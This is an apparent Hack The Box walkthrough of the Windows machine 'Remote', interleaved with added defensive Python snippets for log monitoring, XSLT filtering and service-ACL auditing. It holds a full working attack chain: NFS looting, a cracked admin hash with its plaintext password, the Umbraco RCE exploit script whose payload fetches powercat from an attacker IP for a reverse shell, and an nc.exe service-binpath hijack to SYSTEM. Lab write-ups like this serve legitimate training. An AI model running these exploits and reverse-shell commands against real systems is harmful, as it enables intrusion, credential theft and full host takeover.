Remote

NMAP

nmap -sC -sV -T5 -p- 10.10.10.180
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       syn-ack ttl 127 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
2049/tcp  open  mountd        syn-ack ttl 127 1-3 (RPC #100005)
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49679/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49680/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m18s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-13T13:16:34
|_  start_date: N/A

USER

It is worth looking at services such as:
FTP
HTTP
NFS

ftp 10.10.10.180
Connected to 10.10.10.180.
220 Microsoft FTP Service
Name (10.10.10.180:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> pwd
257 "/" is current directory.

Nothing interesting there, so we keep looking.
Maybe we'll check whether there is anything on NFS.

showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)

As you can see, some network shares are exported, so it's worth taking a look at them.

mount -t nfs -o vers=2 10.10.10.180:/site_backups /mnt/tmp
ls -la
razem 22
drwx------ 2 4294967294 4294967294  4096 maj 14 04:48 .
drwxr-xr-x 6 root       root        4096 maj 14 11:08 ..
drwx------ 2 4294967294 4294967294    64 lut 20 17:16 App_Browsers
drwx------ 2 4294967294 4294967294  4096 lut 20 17:17 App_Data
drwx------ 2 4294967294 4294967294  4096 lut 20 17:16 App_Plugins
drwx------ 2 4294967294 4294967294    64 lut 20 17:16 aspnet_client
drwx------ 2 4294967294 4294967294 49152 lut 20 17:16 bin
drwx------ 2 4294967294 4294967294  8192 lut 20 17:16 Config
drwx------ 2 4294967294 4294967294    64 lut 20 17:16 css
-rwx------ 1 4294967294 4294967294   152 lis  1  2018 default.aspx
-rwx------ 1 4294967294 4294967294    89 lis  1  2018 Global.asax
drwx------ 2 4294967294 4294967294  4096 lut 20 17:16 Media
drwx------ 2 4294967294 4294967294    64 lut 20 17:16 scripts
drwx------ 2 4294967294 4294967294  8192 lut 20 17:16 Umbraco
drwx------ 2 4294967294 4294967294  4096 lut 20 17:16 Umbraco_Client
drwx------ 2 4294967294 4294967294  4096 lut 20 17:16 Views
-rwx------ 1 4294967294 4294967294 28539 lut 20 05:57 Web.config

There are a lot of files to look through,
so it's better to search the folder for keywords such as user, admin, pass, username, password…

find . -type f -exec grep -l "admin" {} \; 
./App_Data/Logs/UmbracoTraceLog.intranet.txt
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19
./App_Data/Logs/UmbracoTraceLog.remote.txt
./App_Data/TEMP/ExamineIndexes/External/Index/_a.fdt
...
./App_Data/TEMP/ExamineIndexes/Internal/Index/_e.cfs
./App_Data/umbraco.config
./App_Data/Umbraco.sdf
./App_Plugins/Terratype/readme.txt
./App_Plugins/Terratype.GoogleMapsV3/Scripts/Terratype.GoogleMapsV3.js
./bin/businesslogic.xml
./bin/cms.dll
./bin/log4net.xml
./bin/System.Web.Helpers.dll
./bin/Umbraco.Core.xml
./bin/umbraco.xml
./Config/Dashboard.config
./Umbraco/Config/Lang/cs.xml
...

I've shortened this a bit, because the information we're interested in is in the files above.

cat ./App_Data/Logs/UmbracoTraceLog.intranet.txt | grep admin
2020-02-20 00:12:13,455 [P4408/D19/T40] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
cat ./App_Data/Umbraco.sdf | strings | grep admin
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity

This data is a little hard to read, but once tidied up the login and hash are visible:

admin@htb.local
b8be16afba8c314ad33d812f22a04991b90e2aaa
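The UmbracoTraceLog line above is also the defender's signal: every backoffice sign-in is logged with its source IP. As an added example (not from the original post), a small Python detector that parses those lines and flags successful logins from outside an allowlisted admin network, together with the number of failed attempts seen earlier from the same address; the sample log is constructed, and the wording of the failed-login variant is assumed.

```python
import ipaddress
import re

# Matches the BackOfficeSignInManager line format found in UmbracoTraceLog.*.txt.
# The "succeeded" wording is taken from the log line seen on the box; the
# "failed" variant is assumed to follow the same pattern.
LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}),\d+ \[[^\]]+\] \w+ "
    r"Umbraco\.Core\.Security\.BackOfficeSignInManager - Event Id: \d+, "
    r"state: Login attempt (?P<result>\w+) for username (?P<user>\S+) "
    r"from IP address (?P<ip>[\d.]+)$"
)

# Constructed sample log, modelled on the real line: one legitimate login,
# then two failures and a success from an address outside the admin network.
SAMPLE_LOG = """\
2020-02-20 00:12:13,455 [P4408/D19/T40] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
2020-05-14 07:40:01,002 [P4408/D19/T40] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username admin@htb.local from IP address 10.10.14.93
2020-05-14 07:40:02,110 [P4408/D19/T40] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username admin@htb.local from IP address 10.10.14.93
2020-05-14 07:40:03,330 [P4408/D19/T40] INFO Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 10.10.14.93
"""


def parse_logins(log_text):
    """Yield (timestamp, result, user, ip) for every sign-in line in the log."""
    for line in log_text.splitlines():
        m = LOGIN_RE.match(line)
        if m:
            yield m["ts"], m["result"], m["user"], m["ip"]


def flag_backoffice_logins(log_text, allowed_nets):
    """Return successful logins whose source IP is outside the allowlisted networks,
    each paired with the number of failed attempts seen earlier from that IP."""
    nets = [ipaddress.ip_network(n) for n in allowed_nets]
    failures = {}
    alerts = []
    for ts, result, user, ip in parse_logins(log_text):
        if result == "failed":
            failures[ip] = failures.get(ip, 0) + 1
            continue
        if result != "succeeded":
            continue
        if not any(ipaddress.ip_address(ip) in n for n in nets):
            alerts.append((ts, user, ip, failures.get(ip, 0)))
    return alerts


if __name__ == "__main__":
    for alert in flag_backoffice_logins(SAMPLE_LOG, ["192.168.195.0/24"]):
        print("ALERT: backoffice login from outside admin network:", alert)
```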

We run the hash through John the Ripper.

john --wordlist=/usr/share/wordlists/rockyou.txt hash
...
baconandcheese

We have the password for the admin user.
There is a ready-made RCE exploit on exploit-db; all it needed was the login credentials:
https://www.exploit-db.com/exploits/46153

On top of that we'll try to download powercat and get a reverse shell.

# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A


import requests;

from bs4 import BeautifulSoup;

def print_dict(dico):
    print(dico.items());
    
print("Start");

# Execute a calc for the PoC
payload = '''<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.93/powercat.ps1'); powercat -c 10.10.14.93 -p 9090 -e cmd -v";\
 System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ''';

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);

# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);

# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);

soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};

# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);

print("End");
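What makes this exploit work is that the XSLT visualizer runs submitted stylesheets with script extensions enabled, so a msxsl:script block executes arbitrary C# on the server. As an added example (my code, not the exploit's and not Umbraco's), a Python pre-filter that rejects any submitted stylesheet containing an embedded script block, the kind of check an application should apply if it cannot simply disable scripting in its XSLT engine (XsltSettings.EnableScript in .NET); the two sample stylesheets and the prefix "u" are constructed.

```python
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"


def find_script_blocks(xslt_text):
    """Return (namespace, language) for every <script> extension element in the
    stylesheet, e.g. msxsl:script, which .NET compiles and runs when scripting is on."""
    root = ET.fromstring(xslt_text)
    found = []
    for el in root.iter():
        if not isinstance(el.tag, str) or "}" not in el.tag:
            continue  # comments / un-namespaced elements
        ns, local = el.tag[1:].split("}", 1)
        if local == "script" and ns != XSL_NS:
            found.append((ns, el.get("language", "")))
    return found


def is_safe_stylesheet(xslt_text):
    """Accept only well-formed stylesheets with an xsl:stylesheet/xsl:transform root
    and no script blocks. Unparsable input is rejected rather than passed through."""
    try:
        root = ET.fromstring(xslt_text)
    except ET.ParseError:
        return False
    if root.tag not in (f"{{{XSL_NS}}}stylesheet", f"{{{XSL_NS}}}transform"):
        return False
    return not find_script_blocks(xslt_text)


# Constructed samples (not the exploit payload): a plain stylesheet and one that
# declares a C# script block under the hypothetical prefix "u".
SAMPLE_PLAIN = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"><xsl:value-of select="count(//*)"/></xsl:template>
</xsl:stylesheet>"""

SAMPLE_WITH_SCRIPT = """<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:u="http://example.invalid/u">
  <msxsl:script language="C#" implements-prefix="u">public string f() { return "x"; }</msxsl:script>
  <xsl:template match="/"><xsl:value-of select="u:f()"/></xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    for name, text in (("plain", SAMPLE_PLAIN), ("script", SAMPLE_WITH_SCRIPT)):
        print(name, "safe" if is_safe_stylesheet(text) else "REJECTED", find_script_blocks(text))
```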

The reverse shell connects back and we have a look around:

c:\Users>tree /a

Folder PATH listing
Volume serial number is BE23-EB3E
C:.
+---.NET v2.0
+---.NET v2.0 Classic
+---.NET v4.5
+---.NET v4.5 Classic
+---Administrator
+---Classic .NET AppPool
\---Public
    +---Documents
    +---Downloads
    +---Music
    +---Pictures
    \---Videos
c:\Users\Public>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE23-EB3E

 Directory of c:\Users\Public

02/20/2020  03:42 AM    <DIR>          .
02/20/2020  03:42 AM    <DIR>          ..
02/19/2020  04:03 PM    <DIR>          Documents
09/15/2018  03:19 AM    <DIR>          Downloads
09/15/2018  03:19 AM    <DIR>          Music
09/15/2018  03:19 AM    <DIR>          Pictures
05/14/2020  07:35 AM                34 user.txt
09/15/2018  03:19 AM    <DIR>          Videos
               1 File(s)             34 bytes
               7 Dir(s)  19,409,895,424 bytes free

We have user.

type user.txt
7f64057cce50923213270460b4224c2f

ROOT

We download PrivescCheck to see what's interesting.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.93/Invoke-PrivescCheck.ps1') ; Invoke-PrivescCheck"

+------+------------------------------------------------+------+
| TEST | SERVICES > Service Permissions                 | VULN |
+------+------------------------------------------------+------+
| DESC | Checks for services which are modifiable through the  |
|      | Service Control Manager (sc.exe config VulnService bi |
|      | npath= C:\Temp\evil.exe).                             |
+------+-------------------------------------------------------+
[+] Found 1 vulnerable service(s).


Name           : UsoSvc
ImagePath      : C:\Windows\system32\svchost.exe -k netsvcs -p
User           : LocalSystem
Status         : Running
UserCanStart   : True
UserCanRestart : True
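PrivescCheck reports this because the service's security descriptor grants a low-privilege principal the right to change its configuration. As an added example (my code, not PrivescCheck's), a Python check that parses the SDDL string printed by `sc sdshow <service>` and reports allow ACEs that give broad groups SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER; the two SDDL strings are constructed, not UsoSvc's actual descriptor.

```python
import re

# One SDDL ACE: (type;flags;rights;object_guid;inherit_guid;sid). Service
# descriptors normally leave both GUID fields empty.
ACE_RE = re.compile(r"\((\w*);(\w*);(\w*);[^;]*;[^;]*;([\w-]+)\)")

# Service-specific and standard rights as two-letter SDDL tokens.
RIGHT_NAMES = {
    "CC": "QUERY_CONFIG", "DC": "CHANGE_CONFIG", "LC": "QUERY_STATUS",
    "SW": "ENUMERATE_DEPENDENTS", "RP": "START", "WP": "STOP",
    "DT": "PAUSE_CONTINUE", "LO": "INTERROGATE", "CR": "USER_DEFINED_CONTROL",
    "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE",
}
# Rights that let the holder change what the service runs, or rewrite its ACL.
DANGEROUS = {"DC", "WD", "WO", "GA", "GW"}
# Well-known SID abbreviations for broad, low-privilege principals. Note that
# "WD" in the SID field means Everyone, while "WD" in the rights field is WRITE_DAC.
LOW_PRIV = {"AU": "Authenticated Users", "BU": "Users", "WD": "Everyone",
            "IU": "Interactive Users", "AN": "Anonymous"}


def parse_sddl_dacl(sddl):
    """Return (ace_type, rights_set, sid) for each ACE in the D: part of an SDDL string."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else ""
    dacl = dacl.split("S:", 1)[0]  # drop the SACL if one follows
    aces = []
    for ace_type, _flags, rights, sid in ACE_RE.findall(dacl):
        tokens = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        aces.append((ace_type, tokens, sid))
    return aces


def weak_service_aces(sddl):
    """Allow ACEs that hand a low-privilege principal a dangerous service right."""
    findings = []
    for ace_type, rights, sid in parse_sddl_dacl(sddl):
        if ace_type == "A" and sid in LOW_PRIV and rights & DANGEROUS:
            granted = sorted(RIGHT_NAMES[r] for r in rights & DANGEROUS)
            findings.append((LOW_PRIV[sid], granted))
    return findings


# Constructed descriptors: a hardened one and one that lets Authenticated Users
# reconfigure the service (the class of misconfiguration reported above).
SDDL_OK = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
           "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
           "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
SDDL_WEAK = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)")

if __name__ == "__main__":
    for name, sddl in (("ok", SDDL_OK), ("weak", SDDL_WEAK)):
        print(name, weak_service_aces(sddl) or "no weak ACEs")
```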

The old method: change the ImagePath and restart the service.
I had problems running PowerShell, so I downloaded nc.exe to TEMP.

powershell
Invoke-WebRequest -Uri "http://10.10.14.93/nc.exe" -OutFile "C:\windows\temp\nc.exe"
sc config UsoSvc binpath="c:/windows/temp/nc.exe 10.10.14.93 9091 -e cmd.exe"
sc stop UsoSvc
sc start UsoSvc

We have root.

type root.txt
7c9b7e83bd1b5b5062a686de107a035d
